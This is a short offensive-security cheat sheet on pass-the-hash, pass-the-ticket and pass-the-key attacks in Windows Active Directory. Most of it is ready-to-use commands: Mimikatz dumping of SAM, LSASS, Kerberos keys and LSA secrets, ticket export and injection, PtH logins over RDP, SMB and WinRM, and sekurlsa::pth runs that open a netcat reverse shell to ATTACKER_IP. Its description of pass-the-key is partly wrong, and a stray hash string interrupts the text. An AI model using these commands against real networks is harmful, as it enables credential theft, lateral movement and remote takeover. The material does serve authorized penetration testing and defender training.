General

Alternate Authentication with Pass-the-Hash (PtH), Pass-the-Ticket (PtT), and Pass-the-Key (PtK) are methods for authenticating to a system without providing a plaintext password.

Pass-the-Hash (PtH) is an attack technique that allows an attacker to use a stolen password hash to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the NTLM or LM hash of a user's password, which is stored on a Windows system when the user logs in.

Pass-the-Ticket (PtT) is an attack technique that allows an attacker to use a stolen Kerberos ticket to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the Kerberos ticket that is issued to a user when they log in, and then using it to authenticate to other systems on the network.

Pass-the-Key (PtK) is an attack technique that allows an attacker to use a stolen encryption key to decrypt sensitive data, without needing to know the plaintext password. This can be done by capturing the encryption key that is used to encrypt a user's data and then using it to decrypt the data. (Steal key encryption of tickets)

All these methods are used by attackers to gain unauthorized access to a system by bypassing normal authentication mechanisms.

PtH = Using the hash to connect PtT = Using ticket to connect PtK =

LOCAL VS ACTIVE DIRECTORY While using tools such has mimikatz, you can gather local hash and active direcotry hash from users. Take note that mimikatz is not the only tool you can use to find hashes, tickets and keys

Commands

To begin, one must acquire some hashes, tickets, or keys. This can be done using tools such as Mimikatz.

  • Upload Mimikatz to the target System

Alternate Authentication (PtH)

mimikatz # privilege::debug
mimikatz # token::elevate

# Local Users
lsadump::sam

# AD Users
sekurlsa::msv

#Setup Lisener (Attacking Machine)
nc -lvnp PORT

# Launch Reverse Shell (Using nc64 ont the other machine, you can use other technique to launch a reverse shell (Example smb/psexec in msfconsole))
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
  • Other Technique to pass the hash RDP --> xfreerdp /v:VICTIM_IP /u:DOMAIN\MyUser /pth:NTLM_HASH SMB --> psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP WinRM -->evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

Alternate Authentication (PtT)

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# We can inject the tickets into the current session
kerberos::ptt [0;427fcd5]-2-0-40e10000-USER@MACHINE_DOMAIN (Change the tickets)

# Check the if you have the tiket permission
C:\> klist

Alternate Authentication (PtK)

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

#Setup Lisener (Attacking Machine)
nc -lvnp PORT

b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 If we have the RC4 hash:

mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /rc4:RC4_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

If we have the AES128 hash:

mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes128:AES128_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

If we have the AES256 hash:

mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes256:AES256_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

Dump LSAdump

mimikatz # token::elevate
mimikatz # lsadump::secrets